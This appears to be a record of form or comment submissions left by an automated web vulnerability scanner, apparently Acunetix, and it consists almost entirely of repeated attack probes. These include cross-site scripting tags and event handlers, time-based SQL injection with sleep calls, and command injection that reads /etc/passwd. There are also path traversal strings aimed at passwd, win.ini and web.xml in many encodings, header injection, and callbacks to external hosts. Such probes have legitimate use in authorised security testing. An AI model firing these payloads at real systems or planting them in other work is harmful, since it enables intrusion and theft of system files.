1_8X0fI <ScRiPt >prompt(928134)</ScRiPt>

1

1

1

1

1

1

1

1

1

response.write(9096148*9722309)

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

'+response.write(9096148*9722309)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

${99524+100160}

"&cat /etc/passwd&"

1

"+response.write(9096148*9722309)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n972207=v991048

)

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

"|"ld

'

'"()

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

z4Zsw2uQ'

"

1

1

1

http://hitBfG93Xfhft.bxss.me/

/etc/passwd

acunetix_wvs_invalid_filename

'

1

${@print(md5(acunetix_wvs_security_test))}

1

1

yC7G6B7W')

1

"

1

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

q0ZeloaV'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

||cat /etc/passwd

http://www.acunetix.tst

1

1

1

-1

1

1

'"

&dir

comments/.

1'"()&%<ScRiPt >prompt(944197)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

1

1

'"()&%<ScRiPt >prompt(984160)</ScRiPt>

<!--

1

'&dir&'

1

1_954830

-1))

1

"&dir&"

1

1

1

1

file:///etc/passwd

AIMqgOw8'

acu8558\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8558

1

1

1

|dir

acux4754\xc0\xbez1\xc0\xbcz2a\x90bcxuca4754

/\../\../\../\../\../\../\../etc/passwd

oLeH1PYI')

1

1

'|dir

1<ScRiPt >prompt(955463)</ScRiPt>

1

eY9AKs7L'))

WEB-INF/web.xml

"|dir

1<script>prompt(938238)</script>

WEB-INF\web.xml

1

1

1<ScRiPt >prompt(966856)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?914342></ScRiPt>

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(984419)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<video><source onerror="javascript:prompt(904641)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921935)"></g></svg>

................windowswin.ini

1

response.write(9169671*9349259)

..\..\..\..\..\..\..\..\windows\win.ini

1

1<div style=width:expression(prompt(969741))>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

'+response.write(9169671*9349259)+'

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9169671*9349259)+"

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(957337)>

"&cat /etc/passwd&"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975269)>

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<img src=xyz OnErRor=prompt(996505)>

`cat /etc/passwd`

WEB-INF/web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(992069)>

|cat /etc/passwd#

${99553+99423}

WEB-INF\web.xml

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(932175)</sCripT>

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

-1))

1&n922706=v950989

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

"|"ld

QAZqHUIk'

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(982428) //\xf6>

1

'

G30iiquz')

1

1<input autofocus onfocus=prompt(923220)>

1

^(#$!@#$)(()))******

/etc/passwd

ytGxvdw4'))

'"()

1

1

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

<a href='http://www.acunetix.com'>website security</a>

-1

||cat /etc/passwd

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

-1))

1_27c6G <ScRiPt >prompt(995740)</ScRiPt>

1

'&dir&'

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

Mc3G28cm'

http://hitzJ3Dv75c8l.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

file:///etc/passwd

acunetix_wvs_invalid_filename

"&dir&"

1

1

mz2x2r8d')

1

1

1

comments

|dir

1

/\../\../\../\../\../\../\../etc/passwd

'"

1

aRwBnW1b'))

1

http://www.acunetix.tst

1

WEB-INF/web.xml

'|dir

comments

1'"()&%<ScRiPt >prompt(923545)</ScRiPt>

<!--

1

1

1

1

1

comments/.

'"()&%<ScRiPt >prompt(927008)</ScRiPt>

"|dir

WEB-INF\web.xml

1

1

1

1

1

1_925780

1

1

../../../../../../../../../../windows/win.ini

1

acu5493\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5493

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux4168\xc0\xbez1\xc0\xbcz2a\x90bcxuca4168

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(922026)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(925833)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(903872)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948917></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(909300)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(940714)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973012)"></g></svg>

1

1

1<div style=width:expression(prompt(990136))>

1

1

response.write(9908283*9579058)

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

&cat /etc/passwd&

1

1<body onload=prompt(907800)>

WEB-INF\web.xml

'+response.write(9908283*9579058)+'

1

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(934061)>

1

"&cat /etc/passwd&"

"+response.write(9908283*9579058)+"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

1<img src=xyz OnErRor=prompt(935249)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(936863)>

`cat /etc/passwd`

-1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(935074)</sCripT>

1

1

|cat /etc/passwd#

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&lt

1

1

1

-1))

'|'ld

1

1

1

${99872+99843}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n962921=v937634

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

\xf6<img acu onmouseover=prompt(957736) //\xf6>

S3rCWohu'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

Kr7AN1BE')

1<input autofocus onfocus=prompt(985392)>

1some_inexistent_file_with_long_name%00.jpg

1

1

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

QjYnhUUl'))

'

!(()&&!|*|*|

/etc/passwd

'

'"()

1

-1

"

testasp.vulnweb.com

[url=http://www.acunetix.com]website security[/url]

1

"

1

^(#$!@#$)(()))******

1

1_tBlhd <ScRiPt >prompt(953218)</ScRiPt>

1

-1)

||cat /etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

&dir

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitvMETHjfBve.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

MoGb7UkB'

'&dir&'

comments

1

1

1

1

1

1

ZUcggKAd')

"&dir&"

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

ujRDuU9j'))

'"

http://www.acunetix.tst

|dir

1

1

1

1

comments/.

1

1

'|dir

1

<!--

1

1

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(990223)</ScRiPt>

1

1

1

"|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(973109)</ScRiPt>

1

1

1

1

1

1

WEB-INF/web.xml

1_976538

1

1

1

1

WEB-INF\web.xml

acu1587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1587

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acux9468\xc0\xbez1\xc0\xbcz2a\x90bcxuca9468

1

1<ScRiPt >prompt(996591)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1<script>prompt(988225)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(996432)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968640></ScRiPt>

1

1<ScRiPt >prompt(913731)</ScRiPt>

1

................windowswin.ini

1

1

1<video><source onerror="javascript:prompt(959961)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(970204)"></g></svg>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9523927*9748409)

1<div style=width:expression(prompt(925692))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9523927*9748409)+'

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(904266)>

../../../../../../../../../../etc/passwd

"+response.write(9523927*9748409)+"

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969279)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img src=xyz OnErRor=prompt(988328)>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(978547)>

WEB-INF\web.xml

1

${99239+99462}

cat /etc/passwd

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(940756)</sCripT>

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

VlwOkWsz'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1&n985680=v969401

kpSXdMiE')

\xf6<img acu onmouseover=prompt(964329) //\xf6>

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

http://testasp.vulnweb.com/t/xss.html?%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(970332)>

Uhc19CFa'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

'"()

1

"|"ld

testasp.vulnweb.com

^(#$!@#$)(()))******

1

<a href='http://www.acunetix.com'>website security</a>

-1

"

/etc/passwd

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

-1)

1_Gu3tV <ScRiPt >prompt(930186)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

'

1

1

1

-1))

comments

1

http://hitNkfumV0Y35.bxss.me/

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

dLdVy6co'

comments

1

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments/.

OcrzPQ5H')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

ya48Nc7V'))

&dir

1

http://www.acunetix.tst

1

1

1

'"

1

file:///etc/passwd

1

'&dir&'

1'"()&%<ScRiPt >prompt(902942)</ScRiPt>

1

1

1

<!--

1

'"()&%<ScRiPt >prompt(985463)</ScRiPt>

1

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1_905713

1

1

|dir

1

1

WEB-INF/web.xml

1

'|dir

acu9314\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9314

1

1

1

"|dir

WEB-INF\web.xml

acux2869\xc0\xbez1\xc0\xbcz2a\x90bcxuca2869

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(980406)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(967416)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(970883)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995357></ScRiPt>

1

................windowswin.ini

1

1<ScRiPt >prompt(917200)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(976814)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946320)"></g></svg>

response.write(9090734*9744697)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<div style=width:expression(prompt(995394))>

1

'+response.write(9090734*9744697)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<iframe src='data:text/html

"+response.write(9090734*9744697)+"

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(927412)>

../../../../../../../../../../etc/passwd

1

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948075)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(907625)>

1

1

-1

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(934463)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99736+99459}

1<ScRiPt%20>prompt(995766)</sCripT>

1

-1)

`cat /etc/passwd`

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1

|cat /etc/passwd#

1

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n917603=v913301

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

\xf6<img acu onmouseover=prompt(947772) //\xf6>

1

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

1

PtI0XK4s'

1

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(926291)>

"|"ld

'"()

wrMkZWs5')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

testasp.vulnweb.com

7V6PVHjl'))

'

"

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1

1

http://hitYqPej5eMGi.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

1

1_7pfO0 <ScRiPt >prompt(943365)</ScRiPt>

1

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

comments

-1))

1

1

1

'&dir&'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

"&dir&"

PssHnT1S'

1

1

comments/.

file:///etc/passwd

1

1

http://www.acunetix.tst

|dir

'"

BCfzILD9')

1

1

1'"()&%<ScRiPt >prompt(935926)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

'|dir

1

<!--

'"()&%<ScRiPt >prompt(976788)</ScRiPt>

WEB-INF/web.xml

1

1

N5lhdoNt'))

"|dir

1

1

1

1

1_962022

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5011\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5011

1

1

1

../../../../../../../../../../boot.ini

1

1

acux9404\xc0\xbez1\xc0\xbcz2a\x90bcxuca9404

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(997415)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(925126)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(921988)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?937710></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(926462)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(937312)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992387)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

response.write(9287451*9550298)

1

1<div style=width:expression(prompt(969583))>

1

&cat /etc/passwd&

1

'+response.write(9287451*9550298)+'

1

1<iframe src='data:text/html

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

'&cat /etc/passwd&'

"+response.write(9287451*9550298)+"

1<body onload=prompt(933345)>

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

WEB-INF\web.xml

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970615)>

1

1

"&cat /etc/passwd&"

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(923046)>

1

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

1

1<img/src=">" onerror=alert(973537)>

`cat /etc/passwd`

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1))

1<ScRiPt%20>prompt(901904)</sCripT>

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99974+99849}

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&lt

'|'ld

1&n949981=v985753

IKWyI0Wp'

1

1some_inexistent_file_with_long_name%00.jpg

1

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

1

\xf6<img acu onmouseover=prompt(967999) //\xf6>

eL5fH8p5')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

'"()

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

qasD9bEt'))

1<input autofocus onfocus=prompt(983293)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

/etc/passwd

^(#$!@#$)(()))******

1

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

"

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitWCH4HzWKJH.bxss.me/

1_jsIwv <ScRiPt >prompt(908102)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

1

1

Mx5L0X6Z'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

&dir

1

1

http://www.acunetix.tst

1

gsP0A13x')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

'&dir&'

1

comments

file:///etc/passwd

1

1

5u1vopZh'))

1

1

'"

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(930703)</ScRiPt>

comments/.

"&dir&"

1

<!--

1

1

|dir

1

1

'"()&%<ScRiPt >prompt(935135)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

'|dir

1

1_916452

WEB-INF\web.xml

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

acu10099\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10099

1

1

../../../../../../../../../../boot.ini

1

1

acux6766\xc0\xbez1\xc0\xbcz2a\x90bcxuca6766

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(913043)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(938630)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(944830)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936120></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(988931)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(996267)">

response.write(9210923*9032139)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(982688)"></g></svg>

1

&cat /etc/passwd&

'+response.write(9210923*9032139)+'

1

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(954914))>

'&cat /etc/passwd&'

